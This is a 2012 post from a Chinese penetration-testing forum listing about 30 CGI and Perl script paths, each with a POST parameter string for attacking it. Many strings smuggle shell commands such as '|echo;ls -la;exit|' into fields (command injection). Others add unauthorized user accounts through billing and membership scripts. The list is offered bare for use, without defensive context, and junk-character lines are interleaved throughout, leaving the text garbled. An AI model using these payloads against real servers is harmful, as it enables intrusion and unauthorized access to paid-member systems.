中国网络渗透测试联盟
标题:
Cgi-bin 30个漏洞+使用方法
[打印本页]
作者:
admin
时间:
2012-9-13 16:55
标题:
Cgi-bin 30个漏洞+使用方法
==============================
$ Y; B% n% }' W6 T! H8 {
! Z, ] }0 O' P9 h" T. }
/smspass.pl
' y; I5 K; ^# G3 G. h( [
username=username&password=password
' i1 C7 o) }+ a, z' n' t
* j( c# j5 K" x3 l- e* C* z
/index.cgi
( `: U b6 b8 Y5 p3 w# e
wei=ren&gen=command
2 e* G6 _" U- F% l3 j1 f
" C1 v9 ^& K3 E. w- O
/passmaster.cgi
" m2 X9 o7 s% }/ d6 s& f" J
Action=Add&Username=Username&Password=Password
( q, f& r: f9 a# i6 p( [: P
; `7 h& B/ J/ z! I+ M! L8 a. p4 L$ v, ?- x
/accountcreate.cgi
0 h \/ o/ ^" ~- r; O# i" }
username=username&password=password&ref1=|echo;ls|
0 U( \+ |* E" b5 z5 w5 d' y
: y8 q: d4 ~- @; R0 `( K
/form.cgi
. m' y% {) r* G- k# ]( v9 u
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
5 O3 e# H7 W5 c& z# m* d* z, i3 z
+ x# S1 D3 ]$ e* s5 [4 m# ~8 I
/addusr.pl
- n9 D6 q, `1 e6 o6 ]* Q" Z& d! W
/cgi-bin/EuroDebit/addusr.pl
! p: l0 R/ w# s
user=username&pass=Password&confirm=Password
2 o. r: o/ I( P4 M: L* i" v
1 a. X; ?% Q9 {/ S8 m2 ^( h. w- r
/ccbill-local.asp
# j) O8 \. w! _# j# q
post_values=username:password
5 z2 r. }% A. c# ?) x9 j
6 H, ]6 l+ n0 y' O) ~
/count.cgi
\+ a+ [* G# v) g" H {, v
pinfile=|echo;ls -la;exit|
. N7 i4 V* J8 J; D6 s* o; Z6 K
, }* j* K0 t3 W& j' P$ Y( O
/recon.cgi
; q" R: T& _& j7 m' d) \
/recon.cgi?search
7 r3 p& M F' p4 X* t
searchoption=1&searchfor=|echo;ls -al;exit|
* o! n4 z; R: A% S
: S$ R$ T0 i" g; b3 w0 I
/verotelrum.pl
& S8 d6 ~7 X, u: V! Z
vercode=username:password:dseegsow:add:amount<&30>
3 p# B9 g2 f& @* t
( J& {7 F) Q6 q" c
/af.cgi
( f' _' _" b+ d0 T; P2 C
_browser_out=|echo;ls -la;exit;|
# C. ~$ E0 J, {# v8 \( b
: q% J5 f; y. k
/modify.cgi
- s/ |8 F/ _0 i' p* `
username=username&password=password&expire=30
3 [& L: V' F* Z* f& Z, x
9 G5 Q6 I) C! f
/openjournal.cgi
4 t6 I: W+ {& O [7 k# ~
edit=1&ct=2&go=|echo;ls -al;exit|
% }3 ^) e: e% F4 z" g$ j
1 D& ]' i( X+ H) [( b' h4 ^, a7 b
/gx9passwd.cgi
6 D: |1 K4 F/ k9 ]' p! r$ B
cmd=ADD&user=username&pass=password
7 Z7 H+ D$ {% m9 K" @$ e, x
7 W; A- V% W# c' z! R, C9 \4 D. K
/probecontrol.cgi
# Y0 H" |8 W: i$ D% H
command=enable&username=username&password=password
2 a! i7 V6 [" P* o9 _0 J3 C
! z+ y) @5 W* U: j
/recon.cgi
* x4 T4 Z- i8 Z$ F
searchoption=3&searchfor=echo;ls -la;exit
. H, W0 ~7 u3 F' K8 |
6 I3 `0 f9 N. w
/htadd.pl
& R8 V& E. L( h% n( O# E& n2 A* j+ `+ p
configfile=|echo; ls -alt; exit
+ ]& w. i2 f, }5 Q% a: k: A( n9 i
% G$ X) n2 W0 j5 b' z6 P
/gx9passwd.cgi
0 U: b# R6 c4 Z A2 Z$ a- ^
cmd=ADD&user=username&pass=password
2 v" w2 {( T/ y0 i. r1 D# W% l. E
7 @ e2 |: ]3 m0 F4 ~# C
/ibill*.pl
" i; X. Q& i0 e" O+ u* B5 f2 M
reqtype=add&authpwd=authpwd&username=username&password=password
( D' f) R! l0 q+ k
) R: Q# T) Y8 y9 p
/cpay.cgi
3 a7 ?! P# v% v. \+ D. C/ q6 q
command=add_member&username=username(EMAIL)&password=password(DES)
/ r! F# x6 {7 U9 f* Y
7 Q7 w7 c3 V8 x( i4 |
/globill_ut.cgi
4 i" E8 s2 z( F7 t& p3 ?
do=add&username=username&password=password&wpassword=password
( R7 l2 o' j/ R H7 W! m# x$ B
, L4 [% B( I" a
/usercontrol.cgi
' X& |( S: ~+ f% C8 b$ D
command=enable&username=USER&password=PASS
- V: p2 @! |# g7 U$ g
8 G) H- Z* Z# o2 }! D+ y0 _
/globoSALErum.cgi
8 B" Y! L3 g5 k- U$ t& @% f
action=ADD&seccode=seccode&login=username&password=password
. E2 P( c* G$ l ?5 a* L
" M7 L8 W# z; _$ @6 H$ g
/addusr.pl
" o+ n8 l r# i7 k
user=USER&pass=PASS&confirm=PASS
- Q" t- [6 R; J) ^# b4 p* U
( F) h' Q) O3 p L2 H, T/ {& w8 ?
/pincount.cgi
# f0 h- t9 \0 y+ O! _' C/ U* H
/cgi-bin/mastergate/pincount.cgi
3 t' F# B8 \6 k7 e1 l
pinfile=|echo;pwd;exit|
4 a# Y' }+ h6 N" U
4 p: A( f+ K V% z' w. I
/accountcreate.cgi
5 h# R+ e# D, Y6 M+ `7 r ] C9 Q
/cgi-bin/gateway/accountcreate.cgi
, |2 t4 P" M- L$ F5 c
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
* h2 H( `: p3 O2 ]5 C
% G' o) z. ^5 Y* B
/af.cgi
; d" m' r$ T7 z7 [% n" H
/env.cgi
. l C5 @: X. T" F( d) H
ADD+;echo;pwd;exit
% z) E$ b2 ~+ C! Z5 c% @1 l
. [' r7 V# e1 ~$ B V
/count.cgi
0 Y% l% N8 ~1 K0 W9 d' S4 V+ j' ^
pinfile=|echo;pwd;exit|
- F+ B9 q, J; k, c T* F8 H6 r- |
3 d& g9 M, V" J- o3 g8 M2 b$ Z
/recon.cgi
( g9 X; [, V: w7 b" r1 ?( c, A
searchoption=1&searchfor=|echo;ls%20-al;exit|
8 b. ~7 D0 S4 z5 {1 s3 ^5 @
1 U2 P0 U( R5 C9 G
/add.cgi
8 M8 |4 B4 `( [
username=username&password=password&expire=30
l; f1 ~/ i1 w2 J0 e
+ d% u6 e2 t9 j. l# G
==============================
$ a, x* X7 g% y' i" O
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2